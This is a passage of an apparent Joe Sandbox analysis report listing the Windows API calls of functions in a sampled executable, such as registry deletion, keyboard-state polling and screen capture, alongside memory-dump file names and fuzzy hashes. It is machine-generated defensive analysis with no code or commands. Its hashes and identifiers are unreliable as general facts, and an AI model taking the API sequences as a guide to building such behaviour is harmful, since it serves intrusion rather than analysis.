                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006B910B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                  • String ID:
                                                                  • API String ID: 3840717409-0
                                                                  • Opcode ID: 367b9ef6c4fdd057cf71f1f3bd70098cecdf8a93e7629a73f32f37b7cf652ef1
                                                                  • Instruction ID: 1d9e3567a77b2dadde27a8a9a49b1a65b3537a83017433172ef6e590e7ca2795
                                                                  • Opcode Fuzzy Hash: 367b9ef6c4fdd057cf71f1f3bd70098cecdf8a93e7629a73f32f37b7cf652ef1
                                                                  • Instruction Fuzzy Hash: D0413CB5600215BFDB119F65DC48EAE7BBAFF89715F104158FA05DB260E7309981DB20
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006AC10E,?,?), ref: 006AD415
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD451
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4C8
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4FE
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006AC154
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006AC1D2
                                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 006AC26A
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006AC2DE
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006AC2FC
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 006AC352
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006AC364
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 006AC382
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 006AC3E3
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006AC3F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 146587525-4033151799
                                                                  • Opcode ID: f56fc5fd3375a84cefb4167d7ce3bb7a391c9062b59597705907ac4516c62045
                                                                  • Instruction ID: 0abdfd3378a1f244ba9cb4b1cea32bf93c640717a92b13088915fe84e4262bd4
                                                                  • Opcode Fuzzy Hash: f56fc5fd3375a84cefb4167d7ce3bb7a391c9062b59597705907ac4516c62045
                                                                  • Instruction Fuzzy Hash: 02C17B75204611AFDB10EF24C494F6ABBE2BF85318F14859CE45A8B3A2CB71ED46CF91
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 006BA990
                                                                  • GetSystemMetrics.USER32(00000011), ref: 006BA9A7
                                                                  • GetSystemMetrics.USER32(00000004), ref: 006BA9B3
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 006BA9C9
                                                                  • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 006BAC15
                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006BAC33
                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006BAC54
                                                                  • ShowWindow.USER32(00000003,00000000), ref: 006BAC73
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 006BAC95
                                                                  • DefDlgProcW.USER32(?,00000005,?), ref: 006BACBB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                  • String ID: @$(o
                                                                  • API String ID: 3962739598-3877199045
                                                                  • Opcode ID: ed6194b4ca530d8f8b052a55736a3f7aa76f6d5f9b93b9882395b4dfa92e6711
                                                                  • Instruction ID: 32fb1979ab4a2358db1940cd32e265125f4f5c8eb30a6d373a2d2cd88fd117ab
                                                                  • Opcode Fuzzy Hash: ed6194b4ca530d8f8b052a55736a3f7aa76f6d5f9b93b9882395b4dfa92e6711
                                                                  • Instruction Fuzzy Hash: 99B176B1600219EFDF14CFA9C9857EE7BF2BF44704F188069EC59AA295D770A980CB61
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006B97B6
                                                                  • GetFocus.USER32 ref: 006B97C6
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 006B97D1
                                                                  • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 006B9879
                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 006B992B
                                                                  • GetMenuItemCount.USER32(?), ref: 006B9948
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 006B9958
                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 006B998A
                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 006B99CC
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006B99FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                  • String ID: 0$(o
                                                                  • API String ID: 1026556194-191991022
                                                                  • Opcode ID: 019280f1150c39797fdb5372b51c72503dcaa7fba6773f75ef873fb0f183e0cf
                                                                  • Instruction ID: 40de0c562f3671a231b8c8d07a8ac8a5547a833bd8351bdb694339f46009d06c
                                                                  • Opcode Fuzzy Hash: 019280f1150c39797fdb5372b51c72503dcaa7fba6773f75ef873fb0f183e0cf
                                                                  • Instruction Fuzzy Hash: F381CFB15083119FD720DF24C884AEB7BEAFB89314F140A1DFA8597291DB30D985CBB2
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 006A3035
                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 006A3045
                                                                  • CreateCompatibleDC.GDI32(?), ref: 006A3051
                                                                  • SelectObject.GDI32(00000000,?), ref: 006A305E
                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 006A30CA
                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 006A3109
                                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 006A312D
                                                                  • SelectObject.GDI32(?,?), ref: 006A3135
                                                                  • DeleteObject.GDI32(?), ref: 006A313E
                                                                  • DeleteDC.GDI32(?), ref: 006A3145
                                                                  • ReleaseDC.USER32(00000000,?), ref: 006A3150
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                  • String ID: (
                                                                  • API String ID: 2598888154-3887548279
                                                                  • Opcode ID: f2beb4c1a0c677d006faed2743e8cdc0e470c5b7f89c7bda13aaf81fd1aa108d
                                                                  • Instruction ID: e2205a1db9af75fb99694529c9391d3bae651c0fa1adc75bbdde0516607b60d1
                                                                  • Opcode Fuzzy Hash: f2beb4c1a0c677d006faed2743e8cdc0e470c5b7f89c7bda13aaf81fd1aa108d
                                                                  • Instruction Fuzzy Hash: FC61C2B5D00219AFCF14DFA8D884EAEBBB6FF48310F208529E555A7250E771AD41CF94
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 006852E6
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00685328
                                                                  • _wcslen.LIBCMT ref: 00685339
                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00685345
                                                                  • _wcsstr.LIBVCRUNTIME ref: 0068537A
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 006853B2
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 006853EB
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00685445
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00685477
                                                                  • GetWindowRect.USER32(?,?), ref: 006854EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                  • String ID: ThumbnailClass
                                                                  • API String ID: 1311036022-1241985126
                                                                  • Opcode ID: b6b428cd6c66ef1ae72683851a43f62389e3350ee0f256211a58392883dd3ef8
                                                                  • Instruction ID: ca637524bf5774871a435060ddb4cb26019cfde280ec9ab0817dde63323881ff
                                                                  • Opcode Fuzzy Hash: b6b428cd6c66ef1ae72683851a43f62389e3350ee0f256211a58392883dd3ef8
                                                                  • Instruction Fuzzy Hash: 3E91B071104B06AFD708EF24D894AEAB7EBFF41344F144619FA8B82291EB31ED55CB91
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(006F29C0,000000FF,00000000,00000030), ref: 0068C973
                                                                  • SetMenuItemInfoW.USER32(006F29C0,00000004,00000000,00000030), ref: 0068C9A8
                                                                  • Sleep.KERNEL32(000001F4), ref: 0068C9BA
                                                                  • GetMenuItemCount.USER32(?), ref: 0068CA00
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0068CA1D
                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 0068CA49
                                                                  • GetMenuItemID.USER32(?,?), ref: 0068CA90
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0068CAD6
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0068CAEB
                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0068CB0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                  • String ID: 0
                                                                  • API String ID: 1460738036-4108050209
                                                                  • Opcode ID: 40b4b4dbea2971c239bd2afa6b08ffb36e342b5614deb306313c532109566a2b
                                                                  • Instruction ID: 819ef2e082bd91544f47169c4a48ee6715557022e40cb638170b85410f20c5be
                                                                  • Opcode Fuzzy Hash: 40b4b4dbea2971c239bd2afa6b08ffb36e342b5614deb306313c532109566a2b
                                                                  • Instruction Fuzzy Hash: 1661BFB190024AAFDF25EF68C889EFE7BBAFB05364F040259E911A7251D730AD41CB71
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0068E4D4
                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0068E4FA
                                                                  • _wcslen.LIBCMT ref: 0068E504
                                                                  • _wcsstr.LIBVCRUNTIME ref: 0068E554
                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0068E570
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                  • API String ID: 1939486746-1459072770
                                                                  • Opcode ID: 123c6e9220314d94a631a5fca50d29b06b6f10d1bede11844fe78cec22905812
                                                                  • Instruction ID: 279d574709ebbac6cd8aa896e2b0f726991816d18ddc9b25cce72d866643046f
                                                                  • Opcode Fuzzy Hash: 123c6e9220314d94a631a5fca50d29b06b6f10d1bede11844fe78cec22905812
                                                                  • Instruction Fuzzy Hash: BA412372A402147BEB40BB649C47EFF37AEDF51720F100129F901A6182FF769A4197A9
                                                                  APIs
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 006AD6C4
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 006AD6ED
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 006AD7A8
                                                                    • Part of subcall function 006AD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 006AD70A
                                                                    • Part of subcall function 006AD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 006AD71D
                                                                    • Part of subcall function 006AD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006AD72F
                                                                    • Part of subcall function 006AD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 006AD765
                                                                    • Part of subcall function 006AD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 006AD788
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 006AD753
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 2734957052-4033151799
                                                                  • Opcode ID: 2e8d392947d0a3a0bc5f56e458876fa2ba839f4dfc5a398f83f87ea9929b7369
                                                                  • Instruction ID: 72fa0f5eb4c284d9d2633bacfa05023de6e0674824ace9df22a0d39be727ca4d
                                                                  • Opcode Fuzzy Hash: 2e8d392947d0a3a0bc5f56e458876fa2ba839f4dfc5a398f83f87ea9929b7369
                                                                  • Instruction Fuzzy Hash: 033181B5901128BBD725AF51DC88EFFBB7EEF46714F000165F806E7250EB349E469AA0
                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 0068EFCB
                                                                    • Part of subcall function 0063F215: timeGetTime.WINMM(?,?,0068EFEB), ref: 0063F219
                                                                  • Sleep.KERNEL32(0000000A), ref: 0068EFF8
                                                                  • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0068F01C
                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0068F03E
                                                                  • SetActiveWindow.USER32 ref: 0068F05D
                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0068F06B
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0068F08A
                                                                  • Sleep.KERNEL32(000000FA), ref: 0068F095
                                                                  • IsWindow.USER32 ref: 0068F0A1
                                                                  • EndDialog.USER32(00000000), ref: 0068F0B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                  • String ID: BUTTON
                                                                  • API String ID: 1194449130-3405671355
                                                                  • Opcode ID: 9699e732b111b03fd770c9d61a285f951e63d717e24e11b7250f82b78ac8997d
                                                                  • Instruction ID: f0c5a4a71a887fd368c14e84cd45ee064a6c85ba4cca0e44343ec6150c2217ae
                                                                  • Opcode Fuzzy Hash: 9699e732b111b03fd770c9d61a285f951e63d717e24e11b7250f82b78ac8997d
                                                                  • Instruction Fuzzy Hash: 90218BB6200215BFE7107F60ECA9A667B6BFB49744F102229F501C6372EF728C80DB61
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0068F374
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0068F38A
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0068F39B
                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0068F3AD
                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0068F3BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$_wcslen
                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                  • API String ID: 2420728520-1007645807
                                                                  • Opcode ID: 414a4b306278433cafd2bbd4445015673191d03065e57496cec172cdabf9e41f
                                                                  • Instruction ID: 945baab0a13140440c5e6a28c2b89830e87ae3191eb29aed264128da798ae4b3
                                                                  • Opcode Fuzzy Hash: 414a4b306278433cafd2bbd4445015673191d03065e57496cec172cdabf9e41f
                                                                  • Instruction Fuzzy Hash: 5511A7716912A97AD710B3A6DC4AEFF6B7EEFD1B00F4009397401E20D1EAA05D45CBE0
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00653007
                                                                    • Part of subcall function 00652D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4), ref: 00652D4E
                                                                    • Part of subcall function 00652D38: GetLastError.KERNEL32(006F1DC4,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4,006F1DC4), ref: 00652D60
                                                                  • _free.LIBCMT ref: 00653013
                                                                  • _free.LIBCMT ref: 0065301E
                                                                  • _free.LIBCMT ref: 00653029
                                                                  • _free.LIBCMT ref: 00653034
                                                                  • _free.LIBCMT ref: 0065303F
                                                                  • _free.LIBCMT ref: 0065304A
                                                                  • _free.LIBCMT ref: 00653055
                                                                  • _free.LIBCMT ref: 00653060
                                                                  • _free.LIBCMT ref: 0065306E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID: &l
                                                                  • API String ID: 776569668-1676360395
                                                                  • Opcode ID: d9ecf0df8fa576e08940e458497c2554c3c1b86e21a981eb96fae1d1d7986109
                                                                  • Instruction ID: 93dff93f5bad4e4d9d8b200210138759a592f3625e5b3630c3931467da053316
                                                                  • Opcode Fuzzy Hash: d9ecf0df8fa576e08940e458497c2554c3c1b86e21a981eb96fae1d1d7986109
                                                                  • Instruction Fuzzy Hash: CD11D476100109AFCB41EF94C852CDD3BB6FF16351F8146A8FE089B222DA31EA559B94
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 0068A9D9
                                                                  • SetKeyboardState.USER32(?), ref: 0068AA44
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 0068AA64
                                                                  • GetKeyState.USER32(000000A0), ref: 0068AA7B
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 0068AAAA
                                                                  • GetKeyState.USER32(000000A1), ref: 0068AABB
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 0068AAE7
                                                                  • GetKeyState.USER32(00000011), ref: 0068AAF5
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0068AB1E
                                                                  • GetKeyState.USER32(00000012), ref: 0068AB2C
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 0068AB55
                                                                  • GetKeyState.USER32(0000005B), ref: 0068AB63
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: be277167265d82d6942f59d0eae3d07c2b37bb47b4165d00fac0af76ff22a542
                                                                  • Instruction ID: cb8e45ab85b1a77b6c2a3c343d09ed4fabbc04dc2a5b00f0eaad5aa2ee969a7c
                                                                  • Opcode Fuzzy Hash: be277167265d82d6942f59d0eae3d07c2b37bb47b4165d00fac0af76ff22a542
                                                                  • Instruction Fuzzy Hash: E051A67090878429FF35FBE08950BEAABB75F11380F08479EC9C25A6C2DA549B4CC763
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00686649
